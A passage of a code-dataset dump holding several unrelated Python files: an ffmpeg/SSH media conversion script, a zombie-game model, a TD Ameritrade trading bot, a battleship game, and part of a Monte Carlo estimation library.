\"\\\"\"\n video_cmd = ' -c:v copy'\n audio_cmd = ' -c:a copy'\n need_remote = False\n redo_audio = False\n media_info = MediaInfo.parse(normalize_path(path))\n if MediaInfo.can_parse():\n for track in media_info.tracks:\n if track.track_type == 'Video':\n if not track.bit_rate:\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif not track.format.startswith(VIDEO_CODEC) or track.bit_rate > MAX_BITRATE or track.height > MAX_HEIGHT or track.width > MAX_WIDTH:\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif track.height % 2 or track.width %2:\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif track.format.startswith(VIDEO_CODEC) and not track.format_profile.startswith(VIDEO_PROFILE):\n video_cmd = ffmpeg_video_encode\n need_remote = True\n elif track.track_type == 'Audio':\n if track.channel_s > MAX_CHANNELS or not track.format.startswith(AUDIO_CODEC):\n redo_audio = True\n audio_cmd = ffmpeg_audio_encode\n elif track.track_type == 'Text' and track.codec_id and track.codec_id.startswith('S_TEXT'):\n subname = str(track.track_id)\n if track.language:\n subname = track.language\n parts = cur_file.split('.')\n parts[len(parts)-1] = subname\n subcount = 1\n while os.path.isfile('.'.join(parts) + \".srt\"):\n parts[len(parts)-1] = subname + str(subcount)\n subcount = subcount + 1\n subfile = '.'.join(parts) + \".srt\"\n logger.info('Extracting subtitle: ' + subfile)\n sub_cmd = \"ffmpeg -loglevel error -hide_banner -i \\\"\" + cur_file + \"\\\" -map 0:\" + str(int(track.track_id)-1) + \" \\\"\" + subfile + \"\\\"\"\n p = subprocess.Popen(sub_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n for line in p.stdout.readlines():\n logger.error(line)\n retval = p.wait()\n if retval < -1 or retval > 10:\n logger.error('Error: ffmpeg process killed, exiting')\n sys.exit(1)\n if need_remote == True and ssh_enabled == True and JUST_CHECK == False:\n parts = cur_file.split('.')\n in_file = \"in.\" + parts[len(parts)-1]\n out_file = \"out.\" + EXT\n remote_infile = True\n try:\n sftp_client.lstat(in_file)\n except IOError:\n remote_infile = False\n if remote_infile:\n remote_delete(in_file)\n logger.info(\"Sending file: \" + cur_file)\n remote_infile = sftp_client.put(cur_file, in_file)\n if remote_infile:\n logger.info(\"File sent successfully\")\n video_cmd = ssh_ffmpeg_video_encode\n if redo_audio:\n audio_cmd = ssh_ffmpeg_audio_encode\n ffmpeg_cmd = ssh_folder + \"\\\\\" + ssh_ffmpeg_base_cmd + \"\\\"\" + ssh_folder + \"\\\\\" + in_file + \"\\\" \" + video_cmd + audio_cmd + ssh_ffmpeg_middle_cmd + \" \\\"\" + ssh_folder + \"\\\\\" + out_file + \"\\\"\"\n logger.debug(\"Full command: \" + ffmpeg_cmd)\n try:\n stdin, stdout, stderr = ssh_client.exec_command(ffmpeg_cmd)\n retval = stdout.channel.recv_exit_status()\n except Exception as e:\n logger.error(\"Error running remote command: \" + str(e))\n for line in stdout.readlines():\n logger.error(line)\n if retval == 0:\n logger.info('File processed successfully')\n if os.path.isfile(temp_file):\n delete(temp_file)\n try:\n sftp_client.get(out_file,temp_file)\n except IOError:\n logger.error(\"Error downloading processed file\")\n ssh_client.close()\n sys.exit(1)\n remote_delete(in_file)\n remote_delete(out_file)\n if DELETE:\n delete(cur_file)\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n else:\n if cur_file == to_mp4_naming(cur_file):\n cur_file = cur_file + \".new\"\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n stinfo = os.stat(cur_file)\n os.utime(cur_file, (stinfo.st_atime, stinfo.st_mtime+157680000))\n if retval < -1 or retval > 10:\n logger.error('Error: ffmpeg process failed remotely, exiting')\n ssh_client.close()\n sys.exit(1)\n else:\n ffmpeg_cmd = ffmpeg_cmd + video_cmd + audio_cmd + ffmpeg_middle_cmd + \" \\\"\" + temp_file + \"\\\"\"\n\n if JUST_CHECK:\n commands.append(ffmpeg_cmd)\n else:\n if os.path.isfile(temp_file):\n delete(temp_file)\n logger.warning('Encoding ' + cur_file)\n logger.debug(ffmpeg_cmd)\n p = subprocess.Popen(\n ffmpeg_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n for line in p.stdout.readlines():\n logger.error(line)\n retval = p.wait()\n logger.debug('Convert returned: ' + str(retval))\n if retval == 0:\n logger.info('File processed successfully')\n if DELETE:\n delete(cur_file)\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n else:\n if cur_file == to_mp4_naming(cur_file):\n cur_file = cur_file + \".new\"\n cur_file = to_mp4_naming(cur_file)\n move(temp_file, cur_file)\n stinfo = os.stat(cur_file)\n os.utime(cur_file, (stinfo.st_atime, stinfo.st_mtime+157680000))\n if retval < -1 or retval > 10:\n logger.error('Error: ffmpeg process killed, exiting')\n sys.exit(1)\n\n t1 = time.time()\n logger.info('[Media Check] Execution took %s s' % str(round(t1-t0,1)))\n\n if JUST_CHECK:\n for cmd in commands:\n logger.info(cmd)\n sys.exit(0)\n","sub_path":"media_convert_3.py","file_name":"media_convert_3.py","file_ext":"py","file_size_in_byte":17145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"410015342","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 6 00:26:55 2021\n\n@author: hgcol\n\"\"\"\n\nimport glfw\nimport numpy as np\nimport grafica.transformations as tr\nfrom random import random\nfrom random import randint\n\nclass Hinata():\n # Clase que contiene al modelo de Hinata\n def __init__(self, size, P):\n self.pos = [0,-0.7] # Posicion en el escenario\n self.model = None # Referencia al grafo de escena asociado\n self.controller = None # Referencia del controlador, para acceder a sus variables\n self.size = size # Escala a aplicar al nodo \n self.radio = 0.1 # distancia para realizar los calculos de colision\n self.status = \"Healthy\"\n self.life = 1\n self.P = P\n\n def set_model(self, new_model):\n # Se obtiene una referencia a uno nodo\n self.model = new_model\n\n def set_controller(self, new_controller):\n # Se obtiene la referncia al controller\n self.controller = new_controller\n\n def update(self,delta):\n # Se actualiza la posicion del auto\n\n # Si detecta la tecla [right] presionada se mueve hacia la derecha\n if self.controller.is_right_pressed and self.pos[0] < 0.5:\n self.pos[0] += delta\n # Si detecta la tecla [left] presionada se mueve hacia la izquierda\n if self.controller.is_left_pressed and self.pos[0] > -0.5:\n self.pos[0] -= delta\n # Si detecta la tecla [up] presionada\n if self.controller.is_up_pressed and self.pos[1] <= 1:\n self.pos[1] += delta\n # Si detecta la tecla [down] presionada\n if self.controller.is_down_pressed and self.pos[1] >= -1:\n self.pos[1] -= delta\n #print(self.pos[0], self.pos[1])\n\n # Se le aplica la transformacion de traslado segun la posicion actual\n self.model.transform = tr.matmul([tr.translate(self.pos[0], self.pos[1], 0), tr.scale(self.size, self.size, 1)])\n if self.status == \"Infected\":\n self.life -= self.P*delta\n if self.life <= 0:\n self.status = \"Dead\"\n \n def collision(self, enemies):\n # Funcion para detectar las colisiones con las cargas\n\n # Se recorren las cargas \n for enemy in enemies:\n # si la distancia a la carga es menor que la suma de los radios ha ocurrido en la colision\n if (self.radio+enemy.radio)**2 > ((self.pos[0]- enemy.pos[0])**2 + (self.pos[1]-enemy.pos[1])**2):\n self.status = enemy.status\n return\n \nclass Background():\n def __init__(self):\n self.model = None\n self.pos = [0,0]\n\n def set_model(self,new_model):\n self.model = new_model\n \n def update(self,delta):\n self.pos[1] -= delta/2\n if self.pos[1] <= -2:\n self.pos[1] = 0\n self.model.transform = tr.translate(self.pos[0], self.pos[1], 0)\n \nclass Zombie():\n def __init__(self,size):\n self.size = size\n self.model = None\n self.pos = [random()-0.5,random()*0.4+0.6]\n self.radio = 0.1\n self.status = \"Dead\"\n \n def set_model(self,new_model):\n self.model = new_model\n \n def update(self,delta):\n self.pos[1] -= delta/2\n self.model.transform = tr.matmul([tr.translate(self.pos[0],self.pos[1],0),\n tr.scale(self.size,self.size,1)])\n \nclass Human():\n def __init__(self,size,P):\n self.size = size\n self.model = None\n self.pos = [random()-0.5,random()*0.4+0.6]\n self.radio = 0.1\n self.status = None\n self.life = 1\n self.P = P\n \n def set_model(self,new_model):\n self.model = new_model\n \n def update(self,delta):\n self.pos[1] -= delta/2\n self.model.transform = tr.matmul([tr.translate(self.pos[0],self.pos[1],0),\n tr.scale(self.size,self.size,1)])\n if self.status == \"Infected\":\n self.life -= self.P*delta\n if self.life <= 0:\n self.status = \"Dead\"\n \n def set_status(self):\n r = randint(0,1)\n if r == 0:\n self.status = \"Healthy\"\n else:\n self.status = \"Infected\"\n \nclass Store():\n def __init__(self):\n self.model = None\n self.pos = [-0.78, 0.7]\n self.radio = 0.3\n self.status = \"Won\"\n \n def set_model(self,new_model):\n self.model = new_model\n \n def update(self):\n self.model.transform = tr.matmul([tr.translate(self.pos[0], self.pos[1],0), \n tr.scale(0.5, 0.5, 1)])\n ","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"8584702","text":"from selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\nfrom tda.auth import easy_client\nfrom tda.client import Client\nfrom trade_strats import *\nfrom process_data import *\nfrom download_data import *\nfrom config import *\nimport pandas as pd\nimport traceback\nimport datetime\nimport pickle\nimport tda\nimport os\n\n\n# driver_path = '/home/carmelo/Documents/StockMarket/StockCode/TOS/chromedriver_linux64/chromedriver'\n# browser = webdriver.Chrome(driver_path)\ndef get_day_params():\n today = datetime.datetime.now()\n return [today.year, today.month, today.day, today.hour, today.minute]\n\n\ndef waitbar_(current, total):\n done = int(np.round(((100 * (current / total)) / 2) - 1))\n togo = int(np.round(((100 * ((total - current) / total)) / 2)))\n per = str(np.round(100 * current / total, 1))\n print(done * '-' + '>' + togo * '.' + per + '%', end='\\r')\n\n\ndef do_sleep(min, max):\n time_now = time.time()\n sleep_for = np.random.randint(min, max, 1)[0]\n waited_time = time.time() - time_now\n print('\\n')\n while waited_time < sleep_for:\n time.sleep(1)\n waited_time = time.time() - time_now\n waitbar_(waited_time, sleep_for)\n\n\ndef update_positions(p):\n file = open('TOS/positions.pickle', 'wb')\n pickle.dump(p, file)\n file.close()\n return p\n\n\ndef set_positions(d):\n if os.path.exists('TOS/positions.pickle'):\n p = get_positions()\n else:\n p = {}\n file = open('TOS/positions.pickle', 'wb')\n ticker = list(d.keys())[0]\n p[ticker] = d[ticker]\n pickle.dump(p, file)\n file.close()\n\n\ndef get_positions():\n if os.path.exists('TOS/positions.pickle'):\n file = open('TOS/positions.pickle', 'rb')\n positions = pickle.load(file)\n file.close()\n else:\n positions = {}\n return positions\n\n\ndef gen_watchlist(model):\n stocks = load_stocks('/home/carmelo/Documents/StockMarket/StockData/stocks_100d.obj')\n return get_watchlist(stocks, model, save_close=True)\n\n\ndef get_fpt(c, trades=4):\n account = c.get_account(account_id)\n account = account.json()['securitiesAccount']\n total_funds = account['currentBalances']['liquidationValue']\n fpt = np.round(total_funds / 4.25).astype('int')\n return fpt\n\n\ndef get_account_deets(c, funds_per_trade):\n account = c.get_account(account_id)\n account = account.json()['securitiesAccount']\n round_trips = account['roundTrips']\n available_funds = account['currentBalances']['buyingPowerNonMarginableTrade']\n num_trades_available = int(available_funds // funds_per_trade)\n return account, round_trips, available_funds, num_trades_available\n\n\ndef get_high_last(c, tickers):\n quotes = c.get_quotes(tickers)\n quotes = quotes.json()\n last_price = [quotes[ticker][\"lastPrice\"] for ticker in tickers]\n high_price = [quotes[ticker][\"highPrice\"] for ticker in tickers]\n hl = {}\n for idx, ticker in enumerate(tickers):\n hl[ticker] = {'last_price': last_price[idx], 'high_price': high_price[idx]}\n return hl\n\n\ndef get_buy_list(c, model, funds_per_trade, buy_dict={}):\n wl = gen_watchlist(model)\n watchlist = {}\n if os.path.exists('TOS/positions.pickle'):\n p = get_positions()\n p = [k for k in p.keys()]\n for ticker in list(wl.keys()):\n if ticker not in p:\n watchlist[ticker] = wl[ticker]\n else:\n for ticker in list(wl.keys()):\n watchlist[ticker] = wl[ticker]\n\n tickers = list(watchlist.keys())\n close_price = [watchlist[ticker]['close_price'] for ticker in tickers]\n premarket = c.get_quotes(tickers)\n premarket = premarket.json()\n open_ = [premarket[ticker][\"openPrice\"] for ticker in tickers]\n gap = np.array(open_) / np.array(close_price) - 1\n for idx, g in enumerate(gap):\n if model == 'SO':\n condition = g >= 0 and g < 0.1\n elif model == 'DTS':\n condition = g < 0 and g > -0.1\n else:\n return print('Model not supported')\n if condition:\n buy_price = premarket[tickers[idx]][\"openPrice\"]\n slp = watchlist[tickers[idx]]['stop_loss_percent']\n tgp = watchlist[tickers[idx]]['profit_percent']\n sell_price = np.round(buy_price * tgp, 2)\n stop_loss_0 = np.round(buy_price * slp, 2)\n stop_loss_1 = np.round(buy_price * slp, 2)\n shares = int(funds_per_trade / buy_price)\n buy_dict[tickers[idx]] = {'ticker': tickers[idx], 'buy_price': buy_price, 'shares': shares,\n 'buy_status': 'POSSIBLE', 'sell_status': '', 'sell_price': sell_price,\n 'stop_loss_0': stop_loss_0,\n 'stop_loss_1': stop_loss_1, 'buy_order_id': 0, 'sell_order_id': 0,\n 'high_price': buy_price, 'last_price': buy_price,\n 'stop_loss_percent': slp, 'take_gain_percent':tgp, 'days_held': 0,\n 'watchlist_day': watchlist[tickers[idx]]['date'],\n 'purchase_date': get_day_params()}\n return buy_dict\n\n\ndef sell(c, stock, p):\n b = p[stock]\n spec = tda.orders.equities.equity_sell_limit(stock, b['shares'], b['sell_price'])\n sell_order = c.place_order(account_id, spec)\n order_id = tda.utils.Utils(c, account_id).extract_order_id(sell_order)\n if order_id is not None:\n p[stock]['sell_order_id'] = order_id\n p[stock]['sell_status'] = 'WAITING_TO_SELL'\n return p\n\n\ndef stop_loss_sell(c, stock, p, stop_loss):\n b = p[stock]\n spec = tda.orders.equities.equity_sell_limit(stock, b['shares'], b['last_price'])\n sell_order = c.place_order(account_id, spec)\n order_id = tda.utils.Utils(c, account_id).extract_order_id(sell_order)\n if order_id is not None:\n p[stock]['sell_order_id'] = order_id\n p[stock]['sell_status'] = 'WAITING_TO_SELL_STOP_LOSS'\n return p\n\n\ndef buy(c, buy_dict, buy_today):\n data = c.get_quotes(buy_today)\n data = data.json()\n high = [data[ticker][\"highPrice\"] for ticker in buy_today]\n open_ = [data[ticker][\"openPrice\"] for ticker in buy_today]\n last = [data[ticker][\"lastPrice\"] for ticker in buy_today]\n pop_ticker = []\n for idx in range(len(high)):\n if last[idx] > open_[idx] or (high[idx] - open_[idx]) / open_[idx] > 0.1:\n pop_ticker.append(buy_today[idx])\n buy_today = [bt for bt in buy_today if bt not in pop_ticker]\n for stock in buy_today:\n day = get_day_params()\n if buy_dict[stock]['watchlist_day'][1] + 10 + buy_dict[stock]['watchlist_day'][2] < day[1] + 10 + day[2]:\n b = buy_dict[stock]\n spec = tda.orders.equities.equity_buy_limit(stock, b['shares'], b['buy_price'])\n buy_order = c.place_order(account_id, spec)\n order_id = tda.utils.Utils(c, account_id).extract_order_id(buy_order)\n if order_id is not None:\n buy_dict[stock]['buy_order_id'] = order_id\n order = c.get_order(order_id, account_id).json()\n buy_dict[stock]['buy_status'] = order['status']\n set_positions({stock: buy_dict[stock]})\n positions = get_positions()\n return positions\n\n\ndef update_fill_price(c, p):\n try:\n order = c.get_order(p['buy_order_id'], account_id).json()\n buy_price = order['orderActivityCollection'][0]['executionLegs'][0]['price']\n slp = p['stop_loss_percent']\n tgp = p['take_gain_percent']\n sell_price = np.round(buy_price * tgp, 2)\n stop_loss_0 = np.round(buy_price * slp, 2)\n stop_loss_1 = np.round(buy_price * slp, 2)\n p['sell_price'] = sell_price\n p['stop_loss_0'] = stop_loss_0\n p['stop_loss_1'] = stop_loss_1\n p['actual_buy_price'] = buy_price\n except Exception:\n print(traceback.format_exc())\n pass\n return p\n\n\ndef monitor(c, p):\n pop_ticker = []\n for stock in p.keys():\n p[stock]['days_held'] = get_day_params()[2] - p[stock]['purchase_date'][2]\n b_order = c.get_order(p[stock]['buy_order_id'], account_id).json()\n if p[stock]['buy_order_id'] != 0 and p[stock]['buy_status'] != 'FILLED':\n p[stock]['buy_status'] = b_order['status']\n if p[stock]['buy_order_id'] == 'CANCELED':\n pop_ticker.append(stock)\n if p[stock]['sell_order_id'] != 0:\n s_order = c.get_order(p[stock]['sell_order_id'], account_id).json()\n if s_order['status'] == 'FILLED':\n pop_ticker.append(stock)\n if len(pop_ticker) > 0:\n for closed in pop_ticker:\n p.pop(closed)\n p = update_positions(p)\n tickers = list(p.keys())\n hl = get_high_last(c, tickers)\n for stock in p.keys():\n high_price = hl[stock]['high_price']\n last_price = hl[stock]['last_price']\n p[stock]['last_price'] = last_price\n if p[stock]['high_price'] < high_price:\n p[stock]['high_price'] = hl[stock]['high_price']\n p[stock]['stop_loss_1'] = np.round(high_price * p[stock]['stop_loss_percent'], 2)\n if p[stock]['days_held'] > 0:\n if (last_price - p[stock]['stop_loss_1'])/p[stock]['stop_loss_1'] < 0.01:\n c.cancel_order(account_id, p[stock]['sell_order_id'])\n p = stop_loss_sell(c, stock, p, 'stop_loss_1')\n else:\n if (last_price - p[stock]['stop_loss_0'])/p[stock]['stop_loss_0'] < 0.01:\n c.cancel_order(account_id, p[stock]['sell_order_id'])\n p = stop_loss_sell(c, stock, p, 'stop_loss_0')\n p = update_positions(p)\n return p\n\n\ndef status_bar(p):\n # os.system('clear')\n tickers = p.keys()\n statuss = []\n for ticker in tickers:\n stop_loss = p[ticker]['stop_loss_0'] if p[ticker]['days_held'] == 0 else p[ticker]['stop_loss_1']\n target = p[ticker]['sell_price']\n bracket = np.arange(stop_loss, target, (target - stop_loss) / 20)\n current = p[ticker]['last_price']\n place = len(np.nonzero(bracket < current)[0])\n status = [':'] * 21\n try:\n pc = np.round(100 * (current - p[ticker]['actual_buy_price']) / p[ticker]['actual_buy_price'], 1)\n except KeyError:\n pc = 0\n status[place] = str(pc) + '%'\n status = [ticker, str(target)] + status[::-1] + [str(stop_loss)]\n statuss.append(status)\n if len(statuss[0])>0:\n for idx in range(len(statuss[0])):\n line = ''\n for k in range(len(tickers)):\n line += statuss[k][idx].center(11)\n print(line)\n print(time.strftime(\"%Y-%m-%dT%H%M%S\", time.localtime()))\n\n\ndef main():\n c = easy_client(api_key=client_id,\n redirect_uri=redirect_uri,\n token_path='/home/carmelo/Documents/StockMarket/StockCode/TOS/token.pickle')\n fpt = get_fpt(c, trades=4)\n buy_dict_day = 0\n downloaded = True\n bought_today = []\n if os.path.exists('TOS/positions.pickle'): p = get_positions()\n while True:\n day = get_day_params()\n day_condition = all([day[3] * 24 + day[4] / 60 >= 6 * 24 + 40 / 60, day[3] < 13])\n download_condition = all([16 <= day[3] < 23, not downloaded])\n if all([day[3] * 24 + day[4] / 60 >= 6 * 24 + 30 / 60, buy_dict_day != day[2]]):\n downloaded = False\n buy_dict = get_buy_list(c, 'SO', fpt)\n #buy_dict = get_buy_list(c, 'SO', fpt, buy_dict)\n buy_dict_day = day[2]\n try:\n account, round_trips, available_funds, num_trades_available = get_account_deets(c, funds_per_trade=fpt)\n num_trades_available = 0\n if num_trades_available > 0 and len(buy_dict) > 0 and day_condition:\n if len(buy_dict) >= num_trades_available:\n buy_today = random.sample(list(buy_dict.keys()), num_trades_available)\n else:\n buy_today = list(buy_dict.keys())\n buy_today = [bt for bt in buy_today if bt not in bought_today]\n p = buy(c, buy_dict, buy_today)\n if os.path.exists('TOS/positions.pickle'):\n for stock in p.keys():\n if p[stock]['buy_status'] == 'FILLED' and p[stock]['sell_order_id'] == 0:\n bought_today.append(stock)\n p[stock] = update_fill_price(c, p[stock])\n sell(c, stock, p)\n if day_condition:\n p = monitor(c, p)\n status_bar(p)\n except Exception:\n print(traceback.format_exc())\n pass\n if day[3] > 13 or day[3] < 6:\n do_sleep(600, 601)\n else:\n do_sleep(44, 45)\n if download_condition:\n bought_today = []\n downloaded = True\n download_data()\n process_data()\n\n\nmain()\n\n\n# Wait 5-10 mins after open\n# Check if spy is gapping\n# immediately add stock to purchased list prevent duplicates\n\n\n\n# time.strftime(\"%Y-%m-%dT%H%M%S\", time.localtime())\n########################################################\n########################################################\n########################################################\n########################################################\n# history = c.get_price_history('AAPL',\n# period_type=Client.PriceHistory.PeriodType.YEAR,\n# period=Client.PriceHistory.Period.TWENTY_YEARS,\n# frequency_type=Client.PriceHistory.FrequencyType.DAILY,\n# frequency=Client.PriceHistory.Frequency.DAILY)\n\n# r = c.get_orders_by_query(from_entered_datetime=datetime.datetime(2021, 2, ))\n# assert r.status_code == httpx.codes.OK, r.raise_for_status()\n# print(r.json())\n","sub_path":"StockCode/tos_link.py","file_name":"tos_link.py","file_ext":"py","file_size_in_byte":13876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638168742","text":"\nfrom random import randint\n\nboard_in = []\n\nfor i in range(5):\n board_in.append(['O'] * 10)\n\nfor row in board_in:\n print(\" \".join(row))\n\n\n\ndef randow_row(board_in):\n return randint(0, len(board_in) - 1)\n\n\ndef randow_col(board_in):\n return randint(0, len(board_in[0]) - 1)\n\nship=[]\nnumber=0\nwhile(number<5):\n x=randow_row(board_in)\n y=randow_col(board_in)\n if([x,y] not in ship):\n ship.append([x,y])\n number=number+1\n\nprint(ship)\n\ncount=0\nfor i in range(3):\n count=count+1\n print(\"Turn\",count)\n\n guess_row = int(input(\"猜一下船在第几行:\"))\n guess_col = int(input(\"猜一下船在第几列:\"))\n\n if(board_in[guess_row][guess_col]==\"X\"):\n print(\"你已经猜过这个位置了!\")\n\n board_in[guess_row][guess_col] = \"X\"\n\n if ([guess_row, guess_col] in ship):\n print(\"恭喜你猜对了!\")\n break\n elif guess_row not in range(len(board_in)) or guess_col not in range(len(board_in[0])):\n print(\"超出范围了!\")\n\n else:\n print(\"你没有击中我的船!\")\n if (count == 3):\n print(\"Game OVer!\")\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"9.0/9.40_01_slowy.py","file_name":"9.40_01_slowy.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130803400","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport itertools\nimport warnings\nfrom . import setutil\n\n__all__ = []\n\n\ndef public(sym):\n __all__.append(sym.__name__)\n return sym\n\ndef compute_raw_moments(psums, M, empty_value=0):\n '''\n Returns the raw moments or empty_value when M=0.\n '''\n idx = M != 0\n val = np.empty_like(psums, dtype=np.float)\n val[idx, :] = psums[idx, :] / np.tile(M[idx].reshape((-1,1)),\n (1, psums.shape[1]))\n val[M == 0, :] = empty_value\n return val\n\ndef compute_central_moment(psums, M, moment, empty_value=0):\n '''\n Returns the centralized moments or empty_value when M=0.\n '''\n raw = compute_raw_moments(psums, M, empty_value=empty_value)\n if moment == 1:\n return raw[:, 0]\n n = moment\n val = (-1)**n * raw[:, 0]**n\n # From http://mathworld.wolfram.com/CentralMoment.html\n nfact = np.math.factorial(n)\n for k in range(1, moment+1):\n nchoosek = nfact / (np.math.factorial(k) * np.math.factorial(n-k))\n val += nchoosek * (-1)**(n-k) * raw[:, k-1] * raw[:, 0]**(n-k)\n if moment % 2 == 1:\n return val\n # The moment should be positive\n if np.min(val)<0.0:\n \"\"\"\n There might be kurtosis values that are actually\n zero but slightly negative, smaller in magnitude\n than the machine precision. Fixing these manually.\n \"\"\"\n idx = np.abs(val) < np.finfo(float).eps\n val[idx] = np.abs(val[idx])\n if np.min(val)<0.0:\n raise ArithmeticError(\"Significantly negative even moment! Possible problem in computing sums up to {}.\".format(moment))\n return val\n\n\n@public\nclass MIMCData(object):\n\n \"\"\"\n MIMC Data is a class for describing necessary data\n for a MIMC data, such as the dimension of the problem,\n list of levels, times exerted, sample sizes, etc...\n\n In a MIMC Run object, the data is stored in a MIMCData object\n\n \"\"\"\n\n def __init__(self, dim, lvls=None, psums=None, t=None, M=None,\n moments=2):\n self.dim = dim\n self.lvls = lvls # MIMC lvls\n self.psums = psums # sums of lvls\n self.t = t # Time of lvls\n self.M = M # Number of samples in each lvl\n if self.lvls is None:\n self.lvls = []\n if self.psums is None:\n self.psums = np.empty((0, moments))\n if self.t is None:\n self.t = np.empty(0)\n if self.M is None:\n self.M = np.empty(0, dtype=np.int)\n assert(len(self.lvls) == self.psums.shape[0])\n assert(len(self.lvls) == self.M.shape[0])\n assert(len(self.lvls) == self.t.shape[0])\n\n def calcEg(self):\n \"\"\"\n Return the sum of the sample estimators for\n all the levels\n \"\"\"\n return np.sum(self.calcEl())\n\n def __len__(self):\n return len(self.lvls)\n\n def __getitem__(self, ind):\n return MIMCData(self.dim,\n lvls=np.array(self.lvls, dtype=object)[ind].reshape((-1,self.dim)).tolist(),\n psums=self.psums[ind, :].reshape((-1, self.psums.shape[1])),\n t=self.t[ind].reshape(-1), M=self.M[ind].reshape(-1))\n\n def Dim(self):\n return self.dim\n\n def computedMoments(self):\n return self.psums.shape[1]\n\n def calcVl(self):\n return self.calcCentralMoment(2, empty_value=np.inf)\n\n def calcEl(self, moment=1):\n '''\n Returns the sample estimators for moments\n for each level.\n '''\n if moment > self.psums.shape[1]:\n raise ValueError(\"The {}'th moment was not computed\".format(moment))\n assert(moment > 0)\n idx = self.M != 0\n val = np.zeros_like(self.M, dtype=np.float)\n val[idx] = self.psums[idx, moment-1] / self.M[idx]\n return val\n\n def calcCentralMoment(self, moment, empty_value=np.inf):\n return compute_central_moment(self.psums, self.M, moment,\n empty_value=empty_value)\n\n def calcTl(self):\n idx = self.M != 0\n val = np.zeros_like(self.M, dtype=np.float)\n val[idx] = self.t[idx] / self.M[idx]\n return val\n\n def calcTotalTime(self, ind=None):\n return np.sum(self.t)\n\n def addSamples(self, psums, M, t):\n assert psums.shape[0] == len(M) and len(M) == len(t) and np.min(M) >= 0, \\\n \"Inconsistent arguments \"\n\n self.psums += psums\n self.M += M\n self.t += t\n\n def zero_samples(self):\n self.M = np.zeros_like(self.M)\n self.t = np.zeros_like(self.t)\n self.psums = np.zeros_like(self.psums)\n\n def addLevels(self, new_lvls):\n assert(len(new_lvls) > 0)\n prev = len(self.lvls)\n self.lvls.extend(new_lvls)\n s = len(self.lvls)\n self.psums.resize((s, self.psums.shape[1]), refcheck=False)\n self.t.resize(s, refcheck=False)\n self.M.resize(s, refcheck=False)\n return prev\n\n\nclass MyDefaultDict(object):\n def __init__(self, **kwargs):\n self.__dict__ = dict([i for i in kwargs.items() if i[1] is not None])\n\n def getDict(self):\n return self.__dict__\n\n def __getattr__(self, name):\n raise AttributeError(\"Argument '{}' is required but not \\\nprovided!\".format(name))\n\n\n@public\nclass MIMCRun(object):\n\n \"\"\"\n Object for a Multi-Index Monte Carlo run.\n\n Data levels, moment estimators, sample sizes etc. are\n stored in the *.data attribute that is of the MIMCData type\n\n \"\"\"\n\n def __init__(self, old_data=None, **kwargs):\n self.params = MyDefaultDict(**kwargs)\n self.fnHierarchy = None\n self.fnWorkModel = None\n self.fnSampleLvl = None\n self.fnSampleQoI = None\n self.fnItrDone = None\n self.fnExtendLvls = None\n self.Vl_estimate = None\n self.Wl_estimate = None\n self.bias = np.inf # Approximation of the discretization error\n self.stat_error = np.inf # Sampling error (based on M)\n if old_data is not None:\n assert(old_data.dim == self.params.dim)\n self.all_data = self.data = old_data\n else:\n self.all_data = self.data = MIMCData(dim=self.params.dim, moments=self.params.moments)\n if not self.params.reuse_samples:\n self.all_data = MIMCData(dim=self.params.dim, moments=self.params.moments)\n\n if (hasattr(self.params, \"w\") and len(self.params.w) != self.data.dim) or \\\n (hasattr(self.params, \"s\") and len(self.params.s) != self.data.dim) or \\\n (hasattr(self.params, \"gamma\") and len(self.params.gamma) != self.data.dim) or \\\n (hasattr(self.params, \"beta\") and len(self.params.beta) != self.data.dim):\n raise ValueError(\"Size of beta, w, s and gamma must be of size dim\")\n\n if self.params.bayesian and self.data.dim > 1:\n raise NotImplementedError(\"Bayesian parameter fitting is only \\\nsupported in one dimensional problem\")\n\n if self.params.bayesian:\n self.Q = MyDefaultDict(S=np.inf, W=np.inf,\n w=self.params.w, s=self.params.s,\n theta=np.nan)\n else:\n self.Q = MyDefaultDict(theta=np.nan)\n\n def _checkFunctions(self):\n # If self.params.reuse_samples is True then\n # all_data will always equal data\n if self.fnWorkModel is None and hasattr(self.params, \"gamma\"):\n self.fnWorkModel = lambda lvls: work_estimate(lvls,\n np.log(self.params.beta) *\n np.array(self.params.gamma))\n\n if self.fnHierarchy is None:\n self.fnHierarchy = lambda lvls: get_geometric_hl(lvls,\n self.params.h0inv,\n np.array(self.params.beta))\n\n if self.params.bayesian and self.fnWorkModel is None:\n raise NotImplementedError(\"Bayesian parameter fitting is only \\\nsupported with a given work model\")\n\n if self.fnWorkModel is None:\n # ADDING WORK MODEL B\n warnings.warn(\"fnWorkModel is not provided, using run-time estimates.\")\n raise NotImplemented(\"Need to check that the lvls \\\nare the same as the argument ones\")\n self.fnWorkModel = lambda lvls: self.Tl()\n # self.fnExtendLvls = self.fnExtendLvls or \\\n # (lambda: extend_lvls_tensor(self.data.dim,\n # self.data.lvls,\n # self.params.M0,\n # self.params.min_lvls/self.params.dim))\n if self.fnExtendLvls is None:\n weights = np.array(self.params.beta) * (np.array(self.params.w) +\n (np.array(self.params.s) -\n np.array(self.params.gamma))/2.)\n weights /= np.sum(weights)\n if len(weights) == 1:\n weights = weights[0]*np.ones(self.params.dim)\n\n self.fnExtendLvls = lambda w=weights: extend_lvls_td(w,\n self.data.lvls,\n self.params.M0,\n self.params.min_lvls/self.params.dim)\n if self.fnSampleQoI is not None:\n if self.fnSampleLvl is not 